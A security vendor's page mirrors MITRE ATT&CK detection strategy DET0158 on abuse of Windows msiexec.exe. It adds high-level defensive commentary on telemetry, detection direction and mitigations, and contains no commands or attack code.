Live Active security incident? Get immediate response
MITRE ATT&CK® Detection Strategy

DET0158: Detection of Msiexec Abuse for Local, Network, and DLL Execution

This detection strategy matters because it focuses on abuse of msiexec.exe, a legitimate Microsoft Windows Installer utility that adversaries may use to pr...

EnterpriseDET0158Detection StrategyObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This detection strategy matters because it focuses on abuse of msiexec.exe, a legitimate Microsoft Windows Installer utility that adversaries may use to proxy execution of malicious payloads, including local or network-accessible MSI files and DLLs. For leaders, the business issue is not the installer tool itself, but whether the organization can distinguish normal software installation activity from stealthy execution through a trusted, signed Windows binary.

Executive priority

Prioritize this as a control-validation topic for Windows environments because the related ATT&CK technique, T1218.007 Msiexec, sits in a stealth context and can blur the line between routine administration and adversary execution. Executives should ask whether SOC, endpoint, and incident response teams have enough process, command-line, network path, and installer activity evidence to investigate suspicious msiexec behavior without disrupting legitimate software deployment operations.

Technical view

The supplied ATT&CK object is a detection strategy for T1218.007 Msiexec, but it does not include official detection logic or platform metadata of its own. The relationship context identifies the relevant behavior: msiexec.exe may be abused to execute local or network-accessible MSI files and can also execute DLLs. SOC and detection engineering teams should validate visibility around msiexec process execution, parent-child process relationships, command-line arguments, file paths, network locations, and DLL-related execution indicators, especially where msiexec activity occurs outside expected software deployment workflows.

Likely telemetry

  • Endpoint process creation events for msiexec.exe
  • Command-line arguments associated with msiexec execution
  • Parent and child process relationships involving msiexec.exe
  • File access or execution records for local MSI packages
  • Evidence of msiexec referencing network-accessible installer locations

Detection direction

  • Baseline legitimate msiexec usage from software deployment, patching, and administrative installation workflows before alerting broadly.
  • Review msiexec executions that reference unusual local paths, user-writable locations, or network-accessible resources, while accounting for legitimate enterprise installer shares.
  • Correlate msiexec process activity with parent process context to distinguish expected management tooling from unexpected user, script, or document-driven launch patterns.
  • Tune detections for stealthy use of a trusted Windows binary rather than treating Microsoft signature alone as benign.
  • Use the relationship to T1218.007 as the primary detection scope, since this detection-strategy object does not provide official detection text.

Mitigation priorities

  • Confirm that endpoint telemetry captures process creation and command-line detail for Windows systems where msiexec is present.
  • Establish an approved software installation baseline, including sanctioned deployment tools and network installer locations.
  • Restrict or monitor software installation paths and network shares according to least-privilege and change-management requirements.
  • Ensure incident responders have playbooks for investigating suspicious installer execution without assuming all msiexec activity is malicious.
  • Use detection validation exercises to test whether local MSI, network-based MSI, and DLL-related msiexec activity would be visible to the SOC.
Analyst notes and limits

This take is based on the detection strategy DET0158 and its relationship to ATT&CK technique T1218.007 Msiexec. The ATT&CK object itself provides no official description, no official detection text, no tactics, and no platforms. The practical guidance therefore relies on the supplied relationship context, which identifies msiexec abuse for local, network, and DLL execution and indicates the related technique is Windows-focused.

Local environment evidence is required to determine what is suspicious, because msiexec is also a normal administrative and software installation utility. This summary does not assert active exploitation, attribution, customer exposure, or guaranteed detection coverage. No vendor-specific controls or detection rules are provided by the supplied ATT&CK fields.

Official MITRE ATT&CK definition

Detection of Msiexec Abuse for Local, Network, and DLL Execution

No official description is available in the imported ATT&CK source object.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 rows
Domain ID Name Relationship / procedure
Enterprise T1218.007 Msiexec Sub-technique This object detects Msiexec.
Relationship explorer

All related ATT&CK context

detects · Technique T1218.007: Msiexec Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
6fe29f8c99f63fb1...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 6fe29f8c99f6…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack DET0158
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use